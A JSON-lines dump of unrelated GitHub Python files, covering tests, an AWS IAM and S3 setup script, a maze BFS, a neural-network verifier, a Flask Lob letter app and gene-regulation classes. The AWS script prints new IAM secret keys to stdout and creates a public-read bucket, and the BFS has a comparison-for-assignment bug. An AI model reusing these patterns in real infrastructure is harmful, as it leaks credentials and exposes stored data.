test_get_model_input(context, dummy_data):\n X, y, _ = get_model_input(\n data=dummy_data,\n winner_col=context.params['winner_col'],\n loser_col=context.params['loser_col'],\n keep_cols=[context.params['date_col']])\n\n # output index should be same as input index\n assert list(X.index) == list(y.index) == list(dummy_data.index)\n\n # X and y same length\n assert len(X) == len(y) == len(dummy_data)\n\n # 1 for player_1 should be offset by -1 for player_2, ignoring date col\n assert all(X.drop(columns=context.params['date_col']).sum(axis=1)) == 0\n\n # player names should be column names\n assert all(dummy_data[context.params['winner_col']].isin(X.columns))\n assert all(dummy_data[context.params['loser_col']].isin(X.columns))\n\n # y should be all 1's\n assert y.sum() == len(y)\n\n\ndef test_get_starting_abilities(context, dummy_data):\n abilites = get_starting_abilities(\n players=[\"Tom\", \"Harry\"],\n data=dummy_data,\n winner_col=context.params['winner_col'],\n winner_pts=context.params['winner_pts'],\n loser_col=context.params['loser_col'],\n loser_pts=context.params['loser_pts'])\n\n np.testing.assert_array_equal(abilites, np.array([100, 10]))\n assert abilites.dtype is np.dtype(float)\n","repo_name":"gtynan/research_papers","sub_path":"high_dim_bt/src/tests/test_nodes/test_data_engineering.py","file_name":"test_data_engineering.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41204581906","text":"import boto3\nfrom parameters import putParameter\nimport properties\n\n\n\n\nAccount_ID = boto3.client('sts').get_caller_identity()['Account'] \nmy_session = boto3.session.Session()\nRegion = my_session.region_name\n\n## Figure out some parameters used throughout the application\n\nputParameter('Account_ID', Account_ID, 'True')\nputParameter('Region', Region, 'True')\n\n\n## List of IAM users to create\n## This will create user, assign associated policy, create a secret/key\n## List of users is in properties.py file\n\ndef addIAMusers():\n for id, info in properties.iamUsers.items():\n \n print(\"\\nUser_ID:\", id, info)\n\n client = boto3.client('iam')\n \n client.create_user(\n UserName = properties.iamUsers[id]['name'],\n PermissionsBoundary = properties.iamUsers[id]['boundary'],\n Tags=[\n {\n 'Key': 'Purpose',\n 'Value': 'MigrationProcess'\n }\n ]\n )\n \n\n data = client.create_access_key(\n UserName=properties.iamUsers[id]['name']\n )\n\n #putParameter( Account_ID, 'UserName', data['AccessKey']['UserName'], 'false')\n putParameter(data['AccessKey']['UserName'] + '/AccessKeyId', data['AccessKey']['AccessKeyId'], 'false')\n putParameter(data['AccessKey']['UserName'] + '/SecretAccessKey', data['AccessKey']['SecretAccessKey'], 'True')\n\n print('++++++++++++++++++')\n print(properties.iamUsers[id]['name'], 'created')\n print(data['AccessKey']['UserName'])\n print(data['AccessKey']['AccessKeyId'])\n print(data['AccessKey']['SecretAccessKey'])\n\n\n## Create S3 bucket \n## This bucket is where CFN and lambda functions are uploaded for setup process\n## Bucket has region code so lamda will work (DO NOT CHANGE it will break stuff)\n## Bucket has public ACL due to lambda deploy (DO NOT change it will break stuff)\n## Nothing confidential is included in this bucket\n\ndef createS3bucket():\n\n client = boto3.client('s3')\n\n bucket_name = {\n client.create_bucket(\n ACL='public-read',\n Bucket = Account_ID + '-migration' + '-' + Region,\n )\n }\n print(bucket_name)\n putParameter('Bucket_Name', bucket_name, 'false')\n\n\naddIAMusers()\ncreateS3bucket()","repo_name":"DanielM70/migration_setup","sub_path":"setupRequirements.py","file_name":"setupRequirements.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2008443964","text":"from collections import deque\n\ndef solution(maps):\n n = len(maps)\n m = len(maps[0])\n \n # 시작 지점(S), 레버 위치(L) 파악\n for x in range(n):\n for y in range(m):\n if maps[x][y] == 'S':\n s_pos = [x, y]\n elif maps[x][y] == 'L':\n l_pos = [x, y]\n \n # 시작 지점에서 레버로 이동\n StartToLever = bfs(s_pos, 'L', maps)\n if StartToLever == -1:\n return -1\n # 레버에서 출구로 이동\n LeverToExit = bfs(l_pos, 'E', maps)\n if LeverToExit == -1:\n return -1\n return StartToLever + LeverToExit\n \n \ndef bfs(start_pos:list, target_mark:str, arr: list):\n start_x = start_pos[0]\n start_y = start_pos[1]\n \n n = len(arr)\n m = len(arr[0])\n visited = [[False for _ in range(m)] for _ in range(n)]\n \n queue = deque([[start_x, start_y, 0]])\n while queue:\n x, y, count = queue.popleft()\n visited[x][y] = True\n \n if arr[x][y] == target_mark:\n return count\n \n if 0 <= x-1 and visited[x-1][y] == False:\n if arr[x-1][y] != 'X':\n queue.append([x-1, y, count + 1])\n visited[x-1][y] = True\n if 0 <= y-1 and visited[x][y-1] == False:\n if arr[x][y-1] != 'X':\n queue.append([x, y-1, count + 1])\n visited[x][y-1] == True\n if x+1 < n and visited[x+1][y] == False:\n if arr[x+1][y] != 'X':\n queue.append([x+1, y, count + 1])\n visited[x+1][y] = True\n if y+1 < m and visited[x][y+1] == False:\n if arr[x][y+1] != 'X':\n queue.append([x, y+1, count + 1])\n visited[x][y+1] = True\n return -1","repo_name":"jst0951/CodingTest","sub_path":"프로그래머스/2/159993. 미로 탈출/미로 탈출.py","file_name":"미로 탈출.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26921583065","text":"import numpy as np\nimport os\nimport sys\n\nif(len(sys.argv)<2):\n print(\"Syntax: check_nev.py file\")\n\n\n\nfor i in range(1,len(sys.argv)):\n infile=sys.argv[i]\n \n if(not (os.path.exists(infile))):\n print(\"Error, \"+infile+\" does not exist!\\n\")\n exit(1)\n else:\n print(\"Working on file: \"+infile)\n with open(infile,\"rb\") as fin:\n nevents=np.fromfile(fin,dtype=np.int64,count=1)[0]\n if(i==1):\n nref=nevents\n print(\"Reference number of events is: \"+str(nevents))\n else:\n if(nevents!=nref):\n print(\"Error, \"+infile+\" has a different number of events: \"+str(nevents)+\"\\n\")\n exit(1)\nprint(\"Check completed, all fine!\") \n","repo_name":"gabriele-inghirami/coarse_graining","sub_path":"utilities/check_nev.py","file_name":"check_nev.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23455735955","text":"from netver.backend.ProVe import ProVe\nimport numpy as np; import tensorflow as tf\n\n\nclass CompleteProVe( ProVe ):\n\n\t\"\"\"\n\tA class that implements Complete ProVe, a verification tool based on the interval propagation. \n\tThis tool is based on a parallel implementation of the interval analysis on GPU that increase the performance. \n\tThe main difference between ProVe and Complete ProVe is that the second can also formally verify a violation and not only\n\twhen a property is respected. This results allows Complete ProVe to compute the vaiolation rate, the percentage of the input domain \n\tthat cause a violation, this tool does not terimante as soon as it found a counterexample, but seraches an all the input-domain to prove (or deny) \n\tthe proeprty at each point bound-wise (see [b] for the details). \n\t[a] coming soon ....\n\n\tAttributes\n\t----------\n\t\tP : list\n\t\t\tinput domain for the property in the form 'positive', each output from a point in this domain must be greater than zero.\n\t\t\t2-dim list: a list of two element (lower_bound, upper_bound) for each input nodes\n\t\tnetwork : tf.keras.Model\n\t\t\ttensorflow model to analyze, the model must be formatted in the 'tf.keras.Model(inputs, outputs)' format\n\t\tdual_network: tf.keras.Model\n\t\t\tthe dual netowrk is built to deny the properties, is the negation of the main netowrk, a property is violated when \"at least\n\t\t\tONE output of the dual netowrk is greater than zero. It also works in \"reverse\" mode, a property is violated when \n\t\t\t\"ALL the outputs of the dual netowrk are greater than zero\"\n\t\tsuper: super()\n\t\t\tthis class is inherited from netver.backend.ProVe, all the paramters of the parent class are inherited in this class\n\n\tMethods\n\t-------\n\t\tverify( verbose )\n\t\t\tmethod that formally verify the property P on the ginve network\n\t\"\"\"\n\n\tdef __init__(self, network, P, dual_network, **kwargs):\n\n\t\t\"\"\"\n\t\tConstructor of the class, also calls the super class constructor ProVe\n\n\t\tParameters\n\t\t----------\n\t\t\tnetwork : tf.keras.Model\n\t\t\t\ttensorflow model to analyze, the model must be formatted in the 'tf.keras.Model(inputs, outputs)' format\n\t\t\tP : list\n\t\t\t\tinput domain for the property in the form 'positive', each output from a point in this domain must be greater than zero.\n\t\t\t\t2-dim list: a list of two element (lower_bound, upper_bound) for each input nodes\n\t\t\"\"\"\n\n\t\tsuper().__init__(network, P, **kwargs)\n\t\tself.dual_network = dual_network\n\n\n\tdef verify( self, verbose ):\n\n\t\t\"\"\"\n\t\tMethod that perform the formal analysis. When the solver explored and verify all the input domain it returns the\n\t\tviolation rate, when the violation rate is zero we colcude the the proeprty is fully respected, i.e., SAT\n\n\t\tParameters\n\t\t----------\n\t\t\tverbose : int\n\t\t\t\twhen verbose > 0 the software print some log informations\n\n\t\tReturns:\n\t\t--------\n\t\t\tsat : bool\n\t\t\t\ttrue if the proeprty P is verified on the given network, false otherwise\n\t\t\tinfo : dict\n\t\t\t\ta dictionary that contains different information on the process, the \n\t\t\t\tkey 'counter_example' returns the input configuration that cause a violation\n\t\t\t\tkey 'exit_code' returns the termination reason (timeout or completed)\n\t\t\t\tkey 'violation_rate' returns the value of the vilation rate as a percentage of the input domain\n\t\t\"\"\"\n\n\t\t# Flatten the input domain to aobtain the areas matrix to simplify the splitting\n\t\tareas_matrix = np.array([self.P.flatten()])\n\n\t\t# Array with the number of violations for each depth level\n\t\tviolation_rate_array = []\n\t\t\n\t\t# Loop until all the subareas are eliminated (verified) or a counter example is found\n\t\tfor cycle in range(self.time_out_cycle):\n\n\t\t\t# Print some monitoring information\n\t\t\tif verbose > 0: print( f\"Iteration cycle {cycle:3d} of {self.time_out_cycle:3d} (checked {100-self.unchecked_area:5.3f}%)\" )\n\n\t\t\t# Eventually round the areas matrix\n\t\t\tif self.rounding is not None: areas_matrix = np.round(areas_matrix, self.rounding)\n\t\t\t\n\t\t\t# Reshape the areas matrix in the form (N, input_number, 2)\n\t\t\ttest_domain = areas_matrix.reshape(-1, self.P.shape[0], 2)\n\n\t\t\t# Call the propagation method to obtain the output bound from the input area (primal and dual)\n\t\t\ttest_bound = self._propagation_method( test_domain, self.network )\n\t\t\ttest_bound_dual = self._propagation_method( test_domain, self.dual_network )\n\n\t\t\t# Call the verifier (N(x) >= 0) on all the subareas\n\t\t\tunknown_id, violated_id, proved_id = self._complete_verifier( test_bound, test_bound_dual )\n\n\t\t\t# Call the updater for the checked area\n\t\t\tself._update_unchecked_area( cycle, proved_id[0].shape[0]+violated_id[0].shape[0] )\n\t\t\t\n\t\t\t# Update the violation rate array to compute the violation rate\n\t\t\tviolation_rate_array.append( len(violated_id[0]) )\n\n\t\t\t# Iterate only on the unverified subareas\n\t\t\tareas_matrix = areas_matrix[unknown_id]\n\n\t\t\t# Exit check when all the subareas are verified\n\t\t\tif areas_matrix.shape[0] == 0: break\n\n\t\t\t# Exit check when the checked area is below the timout threshold\n\t\t\tif self.unchecked_area < self.time_out_checked:\n\t\t\t\t# Update the violation rate array adding all the remaining elements\n\t\t\t\tviolation_rate_array[-1] += areas_matrix.shape[0]\n\t\t\t\tbreak\n\n\t\t\t# Split the inputs (Iterative Refinement)\n\t\t\tareas_matrix = self._split( areas_matrix )\n\n\t\t# Check if the exit reason is the time out on the cycle\n\t\tif cycle >= self.time_out_cycle:\n\t\t\t# return UNSAT with the no counter example, specifying the exit reason\n\t\t\treturn False, { \"counter_example\" : None, \"exit_code\" : \"cycle_timeout\" }\n\n\t\t# Compute the violation rate, multipling the depth for the number for each violation\n\t\t# and normalizing for the number of theoretical leaf\n\t\tviolations_weigth = sum( [ 2**i * n for i, n in enumerate(reversed(violation_rate_array))] ) \n\t\tviolation_rate = violations_weigth / 2**(len(violation_rate_array)-1) * 100 \n\n\t\t# All the input are verified, return SAT with no counter example\n\t\treturn (violation_rate == 0), { \"violation_rate\": violation_rate }\n\n\n\n\tdef _complete_verifier( self, test_bound, test_bound_dual ):\n\t\t\n\t\t\"\"\"\n\t\tMethod that verify the property on a list of the computed (or sampled in semi-formal mode) output bound.\n\n\t\tParameters\n\t\t----------\n\t\t\ttest_bound : list\n\t\t\t\tthe output bound expressed as a 3-dim matrix. (a) a list of list for each splitted domain;\n\t\t\t\t(b) a list of bound for each input node and (c) a list of two element for the node, lower and upper\n\t\t\ttest_bound_dual : list\n\t\t\t\tsame as test_bound but for the dual network\n\n\t\tReturns:\n\t\t--------\n\t\t\tunknown_id : list\n\t\t\t\tlist of integer with the index of the bound that dows not respect the property and require\n\t\t\t\tfurther investigations\n\t\t\tviolated_id : list\n\t\t\t\tlist of integer with the index of the bound that violated the give property\n\t\t\tproved_id : list\n\t\t\t\tlist of integer with the index of the bound that respect the give property\n\t\t\"\"\"\n\n\t\t# Check the property in standard and reverse mode for both a violation and a proof. \n\t\t# To prove the property, in the first case every bound must be greater than zero,\n\t\t# in the latter at least one bound must be greater than zero. \n\t\t# To deny the property, in the first case at least one bound must be greater than zero,\n\t\t# in the latter every one bound must be greater than zero. \n\t\tif not self.reversed:\n\t\t\tproved_bound = np.all(test_bound[:, :, 0] >= 0, axis=1) # Property proved here!\n\t\t\tviolated_bound = np.any(test_bound_dual[:, :, 0] > 0, axis=1) # Property violated here!\n\t\telse:\n\t\t\tproved_bound = np.any(test_bound[:, :, 0] > 0, axis=1) # Property proved here!\n\t\t\tviolated_bound = np.all(test_bound_dual[:, :, 0] >= 0, axis=1) # Property violated here!\n\n\t\t# Create a mask for the unknown, when a property is neither proved or vioalted\n\t\tunknown_mask = np.logical_or(proved_bound, violated_bound)\n\n\t\t# Find the unknown and proved index with the built-in numpy function\t\t\n\t\tunknown_id = np.where( unknown_mask == False )\n\t\tviolated_id = np.where( violated_bound == True )\n\t\tproved_id = np.where( proved_bound == True )\n\n\t\t#\n\t\treturn unknown_id, violated_id, proved_id\n\n","repo_name":"d-corsi/NetworkVerifier","sub_path":"netver/netver/backend/CompleteProve.py","file_name":"CompleteProve.py","file_ext":"py","file_size_in_byte":7956,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"31529816676","text":"import unittest\nfrom CalculatorDB.CaclulatorDB import CalculatorDB\n\n\nclass Add(unittest.TestCase):\n def setUp(self):\n try:\n self.db = CalculatorDB(database=\"test.db\", clear=True)\n except Exception:\n self.skipTest(\"Database not found\")\n\n def test_add_example_str_str(self):\n self.assertTrue(self.db.add_example(\"1 2 +\", \"3\"))\n\n def test_add_example_str_int(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", 3)\n\n def test_add_example_str_float(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", 3.4)\n\n def test_add_example_list_int(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", [3, 3])\n\n def test_add_example_str_tuple(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", (3, 3))\n\n def test_add_example_str_none(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", None)\n\n\nclass Contains(unittest.TestCase):\n def setUp(self):\n try:\n self.db = CalculatorDB(database=\"test.db\", clear=True)\n except:\n self.skipTest(\"Database not found\")\n\n def test_contains_example_1(self):\n self.db.add_example(\"1 2 +\", \"3\")\n examples = self.db.get_all_examples()\n contains = False\n for example in examples:\n if example[0] == \"1 2 +\" and example[1] == \"3\":\n contains = True\n break\n self.assertTrue(contains)\n\n def test_contains_example_many(self):\n examples = [[\"1 2 +\", \"3\"], [\"1 3 +\", \"4\"], [\"1 4 +\", \"5\"]]\n contains_arr = [False, False, False]\n self.db.add_example(examples[0][0], examples[0][1])\n self.db.add_example(examples[1][0], examples[1][1])\n self.db.add_example(examples[2][0], examples[2][1])\n db_examples = self.db.get_all_examples()\n for example in db_examples:\n for i in range(3):\n if example[0] == examples[i][0] and example[1] == examples[i][1]:\n contains_arr[i] = True\n break\n contains = contains_arr[0] and contains_arr[1] and contains_arr[2]\n self.assertTrue(contains)\n","repo_name":"Vemar45/PythonLab","sub_path":"CalculatorDB/IntegrationTestBD_Calculator.py","file_name":"IntegrationTestBD_Calculator.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41708755156","text":"# ~*~ coding: utf-8 ~*~\n'''Main App\n\nThis module contains the logic for rendering pages of the webapp via Flask's routing engine\n'''\n\nimport lob\nimport util\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\nlob.api_key = 'LOB_API_KEY'\nlob.api_version = 'LOB_API_VERSION'\n\n@app.route('/')\ndef index():\n '''\n Renders the home page\n '''\n return render_template('index.html', states=sorted(util.STATES))\n\n\n@app.route('/build_letter', methods=['POST'])\ndef build_letter():\n '''\n This is the page that gets rendered when user submits information for creating a letter\n '''\n resp = util.get_representative(request.form['address1'])\n\n # Handle Civic API errors\n if resp.status_code != 200:\n # Something went wrong with the Google Civics query, render error page\n return render_error_page(resp.json(), 'civic')\n\n # Get the recipient's information\n rep = find_house_member(resp)\n\n # JSON response of letter via Lob\n letter = create_letter(request.form, rep)\n\n # Handle Lob Letter API errors\n if not isinstance(letter, lob.Letter):\n return render_error_page(letter.http_status, 'lob')\n\n # Variable interpolations for the letter\n letter_file = letter['url']\n state = '+'.join(util.STATES[request.form['state']].split()) # Ensure that the get query encodes two-word states correctly\n\n return render_template('build_letter.html', user_data=request.form, resp_data=resp.json(),\n letter_file=letter_file, state=state)\n\n\ndef render_error_page(error, api):\n '''\n Renders an error page that upon a faulty response (JSON) from an API query\n '''\n if api == 'civic':\n error_code = error['error']['code']\n error_msg = util.parse_civic_error(\n error['error']['errors'][0]['reason'])\n return render_template('error.html', code=error_code, msg=error_msg)\n else:\n error_msg = util.parse_lob_error(error)\n return render_template('error.html', code=error, msg=error_msg)\n\n\ndef find_house_member(civics_data):\n '''\n Given the response from the Civics query, return a member of the House of Representatives\n '''\n # I'm positive there's not a simple way to query by official rank :(\n for official in civics_data.json().get('officials'):\n if 'urls' in official:\n for url in official['urls']:\n if '.house.gov' in url:\n return official\n\n\ndef create_letter(sender, recipient):\n '''\n Create letter using Lob's API given sender and recipient data\n '''\n letter = None\n\n try:\n letter = lob.Letter.create(\n description='Letter to ' + sender['name'] + '\\'s Representative',\n from_address={\n 'name': sender['name'],\n 'address_line1': sender['address1'],\n 'address_line2': sender['address2'],\n 'address_city': sender['city'],\n 'address_state': sender['state'],\n 'address_zip': sender['zip'],\n 'address_country': 'US'\n },\n to_address={\n 'name': recipient['name'],\n 'address_line1': recipient['address'][0]['line1'],\n 'address_city': recipient['address'][0]['city'],\n 'address_state': recipient['address'][0]['state'],\n 'address_zip': recipient['address'][0]['zip'],\n 'address_country': 'US'\n },\n\n data={\n 'sender_name': sender['name'],\n 'recipient_name': recipient['name'].split()[1]\n },\n file=util.generate_html(sender['message'].replace('\\n', '
    ')), # textarea adds newlines\n color=True\n )\n return letter\n except Exception as ex:\n return ex\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"trivedi/mail-US-representative","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36208520309","text":"# -*- coding: utf-8 -*-\n\n\nfrom __future__ import (absolute_import, unicode_literals, print_function)\n\n\n\"\"\"\n==============================\nPyOrganism Regulatory Elements\n==============================\n\n:Authors:\n Moritz Emanuel Beber\n:Date:\n 2012-06-08\n:Copyright:\n Copyright(c) 2012 Jacobs University of Bremen. All rights reserved.\n:File:\n elements.py\n\"\"\"\n\n\n__all__ = [\"Gene\", \"Product\", \"Regulator\", \"TranscriptionFactor\", \"SigmaFactor\",\n \"NucleoidAssociatedProtein\", \"Promoter\", \"TranscriptionUnit\", \"Operon\",\n \"Conformation\", \"clear_memory\"]\n\nimport sys\nimport logging\n\nfrom .. import miscellaneous as misc\nfrom ..base import UniqueBase\n\n\nLOGGER = logging.getLogger(__name__)\nLOGGER.addHandler(misc.NullHandler())\n\n\nclass Gene(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", bnumber=\"\", synonyms=None,\n position_start=None, position_end=None, strand=None, sequence=None,\n gc_content=None, product=None, regulatory_product=None, **kw_args):\n super(Gene, self).__init__(unique_id=unique_id, **kw_args)\n self.name = name\n self.bnumber = bnumber\n self.synonyms = misc.convert(synonyms, set, set())\n self.position_start = misc.convert(position_start, int)\n self.position_end = misc.convert(position_end, int)\n self.position = (self.position_start, self.position_end)\n self.strand = strand\n self.sequence = sequence\n self.gc_content = misc.convert(gc_content, float)\n self.product = product\n self.regulatory_product = regulatory_product\n self.transcription_units = set()\n self.operons = set()\n\n def __contains__(self, name):\n if name == self.unique_id:\n return True\n elif name == self.name:\n return True\n # need substring test for bnumber for entries with additional info\n elif name == self.bnumber:\n return True\n elif self.synonyms and any(name == syn for syn in self.synonyms if syn):\n return True\n else:\n return False\n\n def get_transcription_units(self):\n return self.transcription_units\n\n def get_operons(self):\n return self.operons\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"bnumber:\", self.bnumber, file=stream)\n print(\"synonyms:\", self.synonyms, file=stream)\n print(\"position:\", self.position, file=stream)\n\n\nclass Product(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", molecular_weight=None,\n isoelectric_point=None, synonyms=None, go=None, coded_from=None,\n **kw_args):\n super(Product, self).__init__(unique_id=unique_id, **kw_args)\n self.name = name\n self.molecular_weight = misc.convert(molecular_weight, float)\n self.isoelectric_point = misc.convert(isoelectric_point, float)\n self.synonyms = misc.convert(synonyms, set, set())\n self.go = go\n self.coded_from = coded_from\n\n def __contains__(self, name):\n if name == self.unique_id:\n return True\n elif name == self.name:\n return True\n elif self.synonyms and any(name == syn for syn in self.synonyms if syn):\n return True\n elif name == self.go:\n return True\n else:\n return False\n\n def get_transcription_units(self):\n return set(tu for gene in self.coded_from for tu in gene.transcription_units)\n\n def get_operons(self):\n return set(op for gene in self.coded_from for op in gene.operons)\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"synonyms:\", self.synonyms, file=stream)\n print(self.go, file=stream)\n\n\nclass Regulator(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", synonyms=None, go=None,\n coded_from=None, made_from=None, **kw_args):\n super(Regulator, self).__init__(unique_id=unique_id, **kw_args)\n self.name = name\n self.synonyms = misc.convert(synonyms, set, set())\n self.go = go\n self.coded_from = misc.convert(coded_from, set, set())\n self.made_from = misc.convert(made_from, set, set())\n\n def __contains__(self, name):\n if name == self.unique_id:\n return True\n elif name == self.name:\n return True\n elif not self.synonyms is None and any(name == syn for syn in\\\n self.synonyms if syn):\n return True\n elif name == self.go:\n return True\n else:\n return False\n\n def get_transcription_units(self):\n return set(tu for gene in self.coded_from for tu in gene.transcription_units)\n\n def get_operons(self):\n return set(op for gene in self.coded_from for op in gene.operons)\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"synonyms:\", self.synonyms, file=stream)\n print(self.go, file=stream)\n\n\nclass TranscriptionFactor(Regulator):\n\n def __init__(self, unique_id=\"\", conformations=None, **kw_args):\n super(TranscriptionFactor, self).__init__(unique_id=unique_id, **kw_args)\n self.conformations = misc.convert(conformations, set, set())\n\n\nclass SigmaFactor(Regulator):\n\n def __init__(self, unique_id=\"\", **kw_args):\n super(SigmaFactor, self).__init__(unique_id=unique_id, **kw_args)\n\n\nclass NucleoidAssociatedProtein(Regulator):\n\n def __init__(self, unique_id=\"\", **kw_args):\n super(NucleoidAssociatedProtein, self).__init__(unique_id=unique_id,\n **kw_args)\n\n\nclass Conformation(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", tf=None, state=None,\n conformation_type=None, interaction=None, apo_holo=None, **kw_args):\n super(Conformation, self).__init__(unique_id=unique_id, **kw_args)\n self.name = name\n self.t_factor = tf\n self.final_state = state\n self.type = conformation_type\n self.interaction = interaction\n self.apo_holo = apo_holo\n\n\nclass Promoter(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", strand=None, pos_1=None,\n sequence=None, sigma_factor=None, note=None, **kw_args):\n super(Promoter, self).__init__(unique_id=unique_id,\n **kw_args)\n self.name = name\n self.strand = strand\n self.pos_1 = misc.convert(pos_1, int)\n self.sigma_factor = misc.convert(sigma_factor, list, list())\n self.sequence = sequence\n self.note = note\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n\n\nclass TranscriptionUnit(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", promoter=None, operon=None,\n genes=None, **kw_args):\n super(TranscriptionUnit, self).__init__(unique_id=unique_id,\n **kw_args)\n self.name = name\n self.promoter = promoter\n self.operon = operon\n self.genes = misc.convert(genes, list, list())\n\n def __len__(self):\n return len(self.genes)\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"Genes:\", \", \".join([gene.name if gene.name else \"?\" for gene in self.genes]), file=stream)\n\n\nclass Operon(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", strand=None, promoters=None, genes=None,\n gene_position_start=None, gene_position_end=None,\n regulation_position_start=None, regulation_position_end=None, **kw_args):\n super(Operon, self).__init__(unique_id=unique_id,\n **kw_args)\n self.name = name\n self.strand = strand\n self.gene_position_start = misc.convert(gene_position_start, int)\n self.gene_position_end = misc.convert(gene_position_end, int)\n self.regulation_position_start = misc.convert(regulation_position_start, int)\n self.regulation_position_end = misc.convert(regulation_position_end, int)\n self.promoters = misc.convert(promoters, set, set())\n self.genes = misc.convert(genes, list, list())\n\n def __len__(self):\n return len(self.genes)\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"Genes:\", \", \".join([gene.name if gene.name else \"?\" for gene in self.genes]), file=stream)\n\n\ndef clear_memory():\n Gene.clear()\n Product.clear()\n Regulator.clear()\n TranscriptionFactor.clear()\n SigmaFactor.clear()\n NucleoidAssociatedProtein.clear()\n Conformation.clear()\n Promoter.clear()\n TranscriptionUnit.clear()\n Operon.clear()\n\n","repo_name":"Midnighter/pyorganism","sub_path":"pyorganism/regulation/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":8996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"72806793438","text":"import objectManager\n\n# [Esquerda Baixo, Direita Baixo, Direita Cima, Esquerda Cima] -> Fecha um quadrado\ncanvas_aux = 0.93\ncanvas = [[-canvas_aux, -canvas_aux], [canvas_aux, -canvas_aux], [canvas_aux, canvas_aux], [-canvas_aux, canvas_aux]]\ncanvas_viewport_coords = list()\n\ninside_window_code = [0, 0, 0, 0]\n\n# 0 = Acima, 1 = Abaixo, 2 = Direita, 3 = Esquerda, 4 = Esq. Topo, 5 = Dir. Topo, 6 = Dir. Baixo, 7 = Esq. Baixo\non_border_enum = [0, 1, 2, 3, 4, 5, 6, 7]\n\nx_esquerda = canvas[0][0]\nx_direita = canvas[1][0]\ny_topo = canvas[2][1]\ny_fundo = canvas[0][1]\n\ndef clipObject(obj_name: str, normalized_coordinates: list) -> None:\n objectManager.display_file[obj_name].setNormalizedCoordinates(normalized_coordinates)\n region_codes = calculateRegionCodes(normalized_coordinates)\n\n to_draw_coordinates = list()\n on_border_list = list()\n on_line_list = list()\n\n looprange = range(len(normalized_coordinates))\n if objectManager.display_file[obj_name].is_bezier or objectManager.display_file[obj_name].is_bspline:\n looprange = looprange[:len(looprange)-1]\n for index in looprange:\n index0 = index\n index1 = index + 1\n\n if index1 == len(normalized_coordinates):\n index1 = 0\n\n region_code0 = region_codes[index0]\n region_code1 = region_codes[index1]\n\n # 0 = Totally Visible; 1 = Not Visible; 2 = Partially Visible\n line_visibility = 0\n if region_code0 == inside_window_code and region_code1 == inside_window_code:\n line_visibility = 0\n elif [region_code0[i] and region_code1[i] for i in range(len(region_code0))] != inside_window_code:\n line_visibility = 1\n else:\n line_visibility = 2\n\n norm_coord0 = normalized_coordinates[index0]\n norm_coord1 = normalized_coordinates[index1]\n\n if line_visibility == 0:\n to_draw_coordinates.append(norm_coord0)\n to_draw_coordinates.append(norm_coord1)\n on_border_list += [-1, -1]\n\n on_line_list += [[index0, index1], [index0, index1]]\n elif line_visibility == 2:\n line_declive = (norm_coord1[1] - norm_coord0[1]) / (norm_coord1[0] - norm_coord0[0]) # (y2 - y1) / (x2 - x1)\n\n result0 = calculateIntersection(norm_coord0, region_code0, line_declive)\n to_draw_coord0 = result0['coord']\n border0 = result0['border']\n\n # Interseccão é fora da window, não é necessário calcular x2 - se uma interseccão for fora a outra também será\n if to_draw_coord0[0] < x_esquerda or to_draw_coord0[0] > x_direita or to_draw_coord0[1] < y_fundo or to_draw_coord0[1] > y_topo:\n continue\n\n result1 = calculateIntersection(norm_coord1, region_code1, line_declive)\n to_draw_coord1 = result1['coord']\n border1 = result1['border']\n\n to_draw_coordinates.append(to_draw_coord0)\n to_draw_coordinates.append(to_draw_coord1)\n\n on_border_list.append(border0)\n on_border_list.append(border1)\n\n on_line_list += [[index0, index1], [index0, index1]]\n\n objectManager.display_file[obj_name].setToDrawnCoordinates(to_draw_coordinates)\n objectManager.display_file[obj_name].setOnBorderList(on_border_list)\n objectManager.display_file[obj_name].setOnLineList(on_line_list)\n\ndef calculateIntersection(coord: list, region_code: list, line_declive: float) -> dict:\n if region_code == inside_window_code:\n return {'coord': coord, 'border': -1}\n\n # -1 = Dentro, 0 = Acima, 1 = 